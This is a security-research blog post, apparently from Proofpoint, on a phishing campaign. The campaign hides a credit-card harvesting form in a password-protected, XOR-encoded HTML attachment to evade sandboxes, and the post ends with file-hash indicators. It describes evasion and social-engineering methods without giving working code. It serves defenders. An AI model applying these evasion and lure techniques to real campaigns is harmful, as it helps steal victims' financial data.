Phishing Actors Take a Cue From Malware-Distributing Brethren

Share with your network!

Overview

Recently, Proofpoint researchers have observed a number of email campaigns with attached password-protected malicious documents. These documents are primarily used to distribute malware including Cerber ransomware and the Ursnif banking Trojan, with document passwords included in the body of the email. The use of password-protected documents makes them difficult to execute in automated sandbox environments, circumventing a variety of anti-malware products. At the same time, including the password in the email makes it easy for recipients to open the document while password protection adds a sense of legitimacy.

Last week, however, we observed a phishing campaign using this technique designed to harvest credit card account numbers and personal information from account holders.

Analysis

The email sample that we analyzed was personalized with the recipient's name and what appear to be the starting digits of their credit card account number. The starting digits for credit cards are standardized, though, so this just adds to the apparent legitimacy of the carefully crafted emails without requiring actual knowledge of the recipient's' card number. The emails also use stolen branding and social engineering to create a sense of urgency encouraging the recipient to update security information for their "new chip card" (Figure 1).

Personalized phishing email with HTML attachment

Figure 1: Personalized phishing email with HTML attachment

The email includes an HTML attachment that is protected by a password included in the email. The HTML attachment is also XOR-encoded, again making dynamic analysis more difficult. The encoded email is shown in Figure 2:

XOR-encoded HTML file attached to lure email

XOR-encoded HTML file attached to lure email

Figure 2: XOR-encoded HTML file attached to lure email (split for screen wrap)

While the password-protected Microsoft Word documents we normally see in malware campaigns make use of Word’s built-in functionality to add passwords, this is an HTML attachment, so instead uses JavaScript to implement the password protection. The script pah.js (Figure 3) decrypts the XOR-encoded HTML when the user enters the password provided in the body of the email (Figure 4).

Comment on pah.js JavaScript file that accepts password and decodes attached HTML file

Figure 3: Comment on pah.js JavaScript file that accepts a password and decodes the attached HTML file

Password prompt generated when recipient opens attached HTML file

Figure 4: Password prompt generated when the recipient opens the attached HTML file

If the user enters the password correctly, they will be presented with a fairly typical credit card phishing template, complete with stolen branding (redacted - Figure 5):

HTML phishing template after successful decoding

HTML phishing template after successful decoding

Figure 5: HTML phishing template after successful decoding (split for screen wrap)

The form will submit the credentials in the same manner as we see in typical credential phishing, via HTTP POST.

Code snippet from HTML file featuring POST method for submitting phished information

Figure 6: Code snippet from HTML file featuring POST method for submitting phished information

Conclusion

Credential and credit card phishing are nearly as old as cybercrime itself. This hasn't stopped phishing actors from innovating, exploring new approaches to convincing users to divulge personal, banking, and financial information. In this case, we observed threat actors taking a cue from malware distributors, using password protected document attachments to bypass anti-malware technologies and give recipients a false sense of security. The bottom line for end users though is that the appearance of legitimacy, even including personalization and convincing branding, does not equal safety online.

Indicators of Compromise (IOCs)

IOC

IOC Type

Description

e5bbbcea49bf6ba0de0b7d614001be29

MD5

Email sample

d0357e7a96189f0f25099fc84a650fa9546184c5f9263ef06b449b7d02c4f692

SHA256

Email sample

3b01a61c484e7148df640b55f54240e3

 

MD5

HTML Attachment

6ee9d70f02bf71df64a06324d2d5cd32875dc0ab0ef2c7a8abd566f8654a8432

 

SHA256

HTML attachment